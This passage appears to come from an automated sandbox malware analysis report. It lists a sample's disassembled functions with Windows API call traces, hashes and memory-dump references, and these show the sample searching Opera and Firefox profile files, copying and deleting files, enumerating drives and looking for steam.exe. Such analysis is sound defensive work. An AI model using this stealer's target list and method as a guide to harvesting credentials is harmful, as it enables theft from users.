                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                                            • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                            • Opcode ID: aad5053ca9173e086b43a7c8860dd625d7459b2022320881cc90702c44b34ae8
                                                                                                                                                                                                                            • Instruction ID: cfa0aec6b352dae58690e102aaeb3022d81cb88ca45f59a79432ddb89cc4a843
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aad5053ca9173e086b43a7c8860dd625d7459b2022320881cc90702c44b34ae8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57513FB190021D9BCF64DF60DC89AC9B7BDAB49305F0045EAE609E3250EB359BC5CF69
                                                                                                                                                                                                                            Function 0040BF22 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC40,?,?), ref: 0040BF9A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437468), ref: 0040BFBA
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043746C), ref: 0040BFD4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera,0043683B,0043683A,00436837,00436836,00436833,00436832,0043682F), ref: 0040C060
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C06E
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C07C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                            • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                            • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                            • Opcode ID: 15fd7ea73528140aff23c6450068719e990b93e026a0545bb0acdff2c8100502
                                                                                                                                                                                                                            • Instruction ID: 79937c07745840ca59eddc5a5cdfa6df5c628ddd8be8d0246969757881689052
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15fd7ea73528140aff23c6450068719e990b93e026a0545bb0acdff2c8100502
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A021C71A001299BCB21FB26DD466CD7771AF14308F4151EBB948B3191DBB86FC98F88
                                                                                                                                                                                                                            Function 00415182 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00415202
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00415225
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 0041522E
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041524E
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00415269
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414D5C
                                                                                                                                                                                                                              • Part of subcall function 00414D08: FindFirstFileA.KERNEL32(?,?), ref: 00414D73
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414D8F
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414DA0
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E02
                                                                                                                                                                                                                              • Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
                                                                                                                                                                                                                              • Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E3F
                                                                                                                                                                                                                              • Part of subcall function 00414D08: _memset.LIBCMT ref: 00414E68
                                                                                                                                                                                                                              • Part of subcall function 00414D08: lstrcatA.KERNEL32(?,?), ref: 00414E7D
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041528A
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00415304
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                            • API String ID: 441469471-147700698
                                                                                                                                                                                                                            • Opcode ID: 866abe29d39d16efc951f45305094ee9e427d039419154299d208ee1c60cd3e2
                                                                                                                                                                                                                            • Instruction ID: 053258c5bb1b64546686566c734b2c50377afb1b03b5d253bdbdf7ee91f387e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 866abe29d39d16efc951f45305094ee9e427d039419154299d208ee1c60cd3e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A513DB190021CAFDF219FA4DC85BEE7BB9FB05304F1041AAEA08A7111E7355E89CF59
                                                                                                                                                                                                                            Function 0040D59B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437568,00436887,?,?,?), ref: 0040D61C
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043756C), ref: 0040D63D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437570), ref: 0040D657
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,00437574,?,0043688F), ref: 0040D6E3
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7BD
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040D888
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040D92B
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040D93F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                            • String ID: prefs.js
                                                                                                                                                                                                                            • API String ID: 893096357-3783873740
                                                                                                                                                                                                                            • Opcode ID: cad70ddec026a7cfc62b084b5d39c99925086fa50e1658ec8e6a542adca6b878
                                                                                                                                                                                                                            • Instruction ID: f0a6ff76f727c394d4957cb6ce69245adfaddabf659322af21fa137247671128
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cad70ddec026a7cfc62b084b5d39c99925086fa50e1658ec8e6a542adca6b878
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74A10971E002289BDB60FB25DD46BCD7775AF04305F4141EAB908B7291DB78AEC98F89
                                                                                                                                                                                                                            Function 0040B5B4 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043741C,00436822,?,?,?), ref: 0040B62C
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437420), ref: 0040B64D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437424), ref: 0040B667
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437428,?,00436823), ref: 0040B6F4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040B755
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 0040ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040B8C0
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040B8D4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3801961486-0
                                                                                                                                                                                                                            • Opcode ID: 2394e80a18f28661cd0cd4ab0de0e2edb9b9f9d9a3390a7cd4f53cde248a0e1c
                                                                                                                                                                                                                            • Instruction ID: e96e7267715f988d6a820118ca15a1de0cc1dff7c2a46cef6ad436fc03b2c80a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2394e80a18f28661cd0cd4ab0de0e2edb9b9f9d9a3390a7cd4f53cde248a0e1c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD812C719006189BCB60FB32DD46ADD7778AF04308F4141AAED08B3291DB789ED98FD9
                                                                                                                                                                                                                            Function 0041247D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00412487
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124A9
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004124B9
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004124CB
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 004124DD
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004124F6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: steam.exe
                                                                                                                                                                                                                            • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                            • Opcode ID: 1f1d547a7b855ff9034f6da7222f6d51af6dd329fee223ce5cabf189c78c11ae
                                                                                                                                                                                                                            • Instruction ID: cf4753bf5f8f3a473b35f1a87767389bf5426fe253dbbe0f85a1726b48fb5a1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f1d547a7b855ff9034f6da7222f6d51af6dd329fee223ce5cabf189c78c11ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50011E70A002289BDB60DF64DD44BDE77B8AB08301F8401A6A409E22A0DB789F918B55
                                                                                                                                                                                                                            Function 00410DB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00410ED4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                                            • Opcode ID: ce6f2f2ca10474b0a97e541b6f36cad0183382322380a2636a05f6b3ca651ab3
                                                                                                                                                                                                                            • Instruction ID: cb4dd5b7474b79c5993221afdf8c45715871f25fde254037933c8c8e47344f7b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce6f2f2ca10474b0a97e541b6f36cad0183382322380a2636a05f6b3ca651ab3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D31FA71900328ABDB20EB65DD89ADEB3B8BB04305F1045EAF519B7152CBB86EC58F54
                                                                                                                                                                                                                            Function 00412554 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041255E
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E73,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 0041258D
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004125B1
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004125C5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
